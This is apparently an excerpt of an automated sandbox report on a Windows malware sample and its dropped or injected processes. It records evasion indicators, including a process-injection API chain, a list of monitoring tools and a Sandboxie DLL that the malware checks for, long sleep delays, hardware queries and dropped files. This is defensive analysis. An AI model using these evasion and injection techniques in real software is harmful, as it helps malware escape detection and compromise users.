                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00007FF65A1310C0
                                  Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,45_2_00007FF7C6D610C0
                                  Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
                                  Source: main.exe, 00000005.00000002.1756028190.000002441A88E000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: SBIEDLL.DLL
                                  Source: dialer.exe, 00000035.00000003.1789947837.0000014A059D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                                  Source: dialer.exe, 00000035.00000003.1789947837.0000014A059D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEVWSNNRAZKCWZIKMI
                                  Source: C:\ProgramData\main.exeMemory allocated: 24417F90000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProgramData\main.exeMemory allocated: 24431A70000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599890Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599781Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599665Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599547Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599433Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599322Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599187Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 599078Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598969Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598859Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598750Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598640Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598531Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598422Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598312Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598203Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 598093Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597976Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597828Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597718Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597609Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597500Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597389Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597278Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597172Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 597062Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596953Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596844Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596703Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596578Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596469Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596359Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596250Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 596113Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595984Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595875Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595763Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595639Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595531Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595420Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595312Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595203Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 595089Jump to behavior
                                  Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\main.exeWindow / User API: threadDelayed 4323Jump to behavior
                                  Source: C:\ProgramData\main.exeWindow / User API: threadDelayed 3384Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6247Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2908Jump to behavior
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4235
                                  Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5764
                                  Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9905
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5172
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3149
                                  Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9858
                                  Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1417
                                  Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 490
                                  Source: C:\ProgramData\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pydJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75722\select.pydJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-23751
                                  Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                  Source: C:\Users\user\Desktop\hacn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16930
                                  Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\ProgramData\main.exeAPI coverage: 2.1 %
                                  Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.8 %
                                  Source: C:\Windows\System32\lsass.exeAPI coverage: 6.1 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 4.9 %
                                  Source: C:\Windows\System32\svchost.exeAPI coverage: 4.7 %
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7988Thread sleep count: 4323 > 30Jump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599890s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599781s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599665s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7988Thread sleep count: 3384 > 30Jump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599547s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599433s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599322s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599187s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -599078s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598969s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598859s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598750s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598640s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598531s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598422s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598312s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598203s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -598093s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597976s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597828s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597718s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597609s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597500s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597389s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597278s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597172s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -597062s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596953s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596844s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596703s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596578s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596469s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596359s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596250s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -596113s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595984s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595875s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595763s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595639s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595531s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595420s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595312s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595203s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7984Thread sleep time: -595089s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7916Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\ProgramData\main.exe TID: 7780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 6247 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 2908 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\winlogon.exe TID: 2588Thread sleep count: 4235 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 2588Thread sleep time: -4235000s >= -30000s
                                  Source: C:\Windows\System32\winlogon.exe TID: 2588Thread sleep count: 5764 > 30
                                  Source: C:\Windows\System32\winlogon.exe TID: 2588Thread sleep time: -5764000s >= -30000s
                                  Source: C:\Windows\System32\lsass.exe TID: 7576Thread sleep count: 9905 > 30
                                  Source: C:\Windows\System32\lsass.exe TID: 7576Thread sleep time: -9905000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 5172 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 3149 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -4611686018427385s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 7716Thread sleep count: 241 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 7716Thread sleep time: -241000s >= -30000s
                                  Source: C:\Windows\System32\dwm.exe TID: 7796Thread sleep count: 9858 > 30
                                  Source: C:\Windows\System32\dwm.exe TID: 7796Thread sleep time: -9858000s >= -30000s
                                  Source: C:\Windows\System32\dialer.exe TID: 8100Thread sleep count: 1417 > 30
                                  Source: C:\Windows\System32\dialer.exe TID: 8100Thread sleep time: -141700s >= -30000s
                                  Source: C:\Windows\System32\dialer.exe TID: 7772Thread sleep count: 490 > 30
                                  Source: C:\Windows\System32\dialer.exe TID: 7772Thread sleep time: -49000s >= -30000s
                                  Source: C:\Windows\System32\dialer.exe TID: 6008Thread sleep time: -85000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 4900Thread sleep count: 251 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 4900Thread sleep time: -251000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 2136Thread sleep count: 253 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 2136Thread sleep time: -253000s >= -30000s
                                  Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\ProgramData\main.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                  Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D341FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF61D341FE4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D328B00 FindFirstFileExW,FindClose,0_2_00007FF61D328B00
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_000EA69B
